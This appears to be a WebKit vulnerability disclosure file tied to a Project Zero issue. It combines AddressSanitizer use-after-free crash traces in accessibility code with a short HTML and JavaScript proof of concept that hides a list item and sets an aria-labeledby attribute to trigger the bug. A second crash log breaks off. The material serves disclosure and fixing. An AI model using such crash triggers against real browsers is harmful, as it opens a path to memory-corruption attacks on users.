=================================================================
==29817==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080000aa7a0 at pc 0x00010b892ab9 bp 0x7fff5edcdf80 sp 0x7fff5edcdf78
READ of size 8 at 0x6080000aa7a0 thread T0
==29817==WARNING: invalid path to external symbolizer!
==29817==WARNING: Failed to use and restart external symbolizer!
#0 0x10b892ab8 in WebCore::AccessibilityRenderObject::handleAriaExpandedChanged() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5fab8)
#1 0x10c14c041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)
#2 0x10c152268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)
#3 0x10c15207c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)
#4 0x10c14b8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)
#5 0x10c14b6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1)
#6 0x10cd8fb93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93)
#7 0x10cd815d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8)
#8 0x10cd81441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441)
#9 0x235a91e01027 (<unknown module>)
#10 0x10859434a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
#11 0x10859434a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
#12 0x10858d91a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)
#13 0x1081f2757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)
#14 0x1081743da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)
#15 0x1077ac0f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)
#16 0x1077ac362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)
#17 0x1077ac6d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)
#18 0x10ca26a15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)
#19 0x10cdba510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510)
#20 0x10c1bb68e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e)
#21 0x10c1bb170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170)
#22 0x10c182d77 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94fd77)
#23 0x10c183d0f in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x950d0f)
#24 0x10c183733 in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x950733)
#25 0x10c7b0af1 in WebCore::ImageLoader::dispatchPendingErrorEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xf7daf1)
#26 0x10c7b0c4a in WebCore::EventSender<WebCore::ImageLoader>::dispatchPendingEvents() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xf7dc4a)
#27 0x10bfa20d4 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f0d4)
#28 0x10c3479ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)
#29 0x10c344d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)
#30 0x10bfc0493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)
#31 0x10c5345c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)
#32 0x10c05f093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)
#33 0x10c01e386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)
#34 0x10baad997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
#35 0x10baa72aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
#36 0x10e42ec41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
#37 0x1018d02eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
#38 0x1018d3689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
#39 0x1018d2ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
#40 0x101173683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
#41 0x100f1d3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)
#42 0x100f26888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)
#43 0x108c20312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)
#44 0x108c20d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)
#45 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)
#46 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)
#47 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)
#48 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)
#49 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#50 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#51 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
#52 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)
#53 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)
#54 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)
#55 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)
#56 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
#57 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
#58 0x100e2e56c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
#59 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)
0x6080000aa7a0 is located 0 bytes inside of 88-byte region [0x6080000aa7a0,0x6080000aa7f8)
freed by thread T0 here:
#0 0x103e1a294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)
#1 0x108c67f30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)
#2 0x10ba0dfda in WebCore::AXObjectCache::remove(unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dafda)
#3 0x10ba1176e in WebCore::AXObjectCache::remove(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1de76e)
#4 0x10de9fc0b in WebCore::RenderObject::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266cc0b)
#5 0x10dd1d9c8 in WebCore::RenderElement::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24ea9c8)
#6 0x10dea012f in WebCore::RenderObject::destroy() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266d12f)
#7 0x10dfffd8f in WebCore::RenderTreeUpdater::tearDownRenderers(WebCore::Element&, WebCore::RenderTreeUpdater::TeardownType)::$_2::operator()(unsigned int) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ccd8f)
#8 0x10dffe2dc in WebCore::RenderTreeUpdater::tearDownRenderers(WebCore::Element&, WebCore::RenderTreeUpdater::TeardownType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cb2dc)
#9 0x10dffd1de in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca1de)
#10 0x10dffcc4d in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9c4d)
#11 0x10dffc47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)
#12 0x10bfa17e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)
#13 0x10ba0cc58 in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9c58)
#14 0x10b84e516 in WebCore::AccessibilityNodeObject::addChildren() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1b516)
#15 0x10b897caf in WebCore::AccessibilityRenderObject::addChildren() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x64caf)
#16 0x10b86a69e in WebCore::AccessibilityObject::updateChildrenIfNecessary() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3769e)
#17 0x10b86a512 in WebCore::AccessibilityObject::children(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37512)
#18 0x10b84e02c in WebCore::AccessibilityNodeObject::insertChild(WebCore::AccessibilityObject*, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1b02c)
#19 0x10b897c01 in WebCore::AccessibilityRenderObject::addChildren() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x64c01)
#20 0x10b86a69e in WebCore::AccessibilityObject::updateChildrenIfNecessary() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3769e)
#21 0x10b86a512 in WebCore::AccessibilityObject::children(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37512)
#22 0x10b83fc55 in WebCore::AccessibilityList::determineAccessibilityRole() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcc55)
#23 0x10b84c66e in WebCore::AccessibilityNodeObject::init() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1966e)
#24 0x10ba0ed91 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbd91)
#25 0x10b892810 in WebCore::AccessibilityRenderObject::handleAriaExpandedChanged() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5f810)
#26 0x10c14c041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)
#27 0x10c152268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)
#28 0x10c15207c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)
#29 0x10c14b8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)
previously allocated by thread T0 here:
#0 0x103e19d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
#1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
#2 0x108c71ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)
#3 0x108c66c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)
#4 0x108bfc437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)
#5 0x108bfb768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)
#6 0x10b835a08 in WTF::RefCounted<WebCore::AccessibilityObject>::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a08)
#7 0x10b881ef9 in WebCore::AccessibilityRenderObject::create(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x4eef9)
#8 0x10ba0fe5d in WebCore::createFromRenderer(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dce5d)
#9 0x10ba0ec59 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbc59)
#10 0x10ba0cb6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)
#11 0x10ba14ab8 in WebCore::AXObjectCache::handleAriaExpandedChange(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e1ab8)
#12 0x10c14c041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)
#13 0x10c152268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)
#14 0x10c15207c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)
#15 0x10c14b8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)
#16 0x10c14b6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1)
#17 0x10cd8fb93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93)
#18 0x10cd815d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8)
#19 0x10cd81441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441)
#20 0x235a91e01027 (<unknown module>)
#21 0x10859434a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
#22 0x10859434a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
#23 0x10858d91a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)
#24 0x1081f2757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)
#25 0x1081743da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)
#26 0x1077ac0f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)
#27 0x1077ac362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)
#28 0x1077ac6d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)
#29 0x10ca26a15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5fab8) in WebCore::AccessibilityRenderObject::handleAriaExpandedChanged()
Shadow bytes around the buggy address:
0x1c10000154a0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c10000154b0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x1c10000154c0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x1c10000154d0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c10000154e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
=>0x1c10000154f0: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fa
0x1c1000015500: fa fa fa fa 00 00 00 fc fc 00 00 00 00 00 00 00
0x1c1000015510: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x1c1000015520: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000015530: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000015540: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==29817==ABORTING
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1249
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.
Note that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.
PoC:
=================================================================
-->
<script>
function go() {
li.hidden = true;
dir.setAttribute("aria-labeledby", "map");
}
</script>
<body onload=go()>
<dir id="dir">
<li id="li">
<map id="map">
<area></area>
<!--
=================================================================
ASan log:
=================================================================
==728==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080000908a0 at pc 0x000109f2cbb5 bp 0x7fff5e08a430 sp 0x7fff5e08a428
READ of size 8 at 0x6080000908a0 thread T0
==728==WARNING: invalid path to external symbolizer!
==728==WARNING: Failed to use and restart external symbolizer!
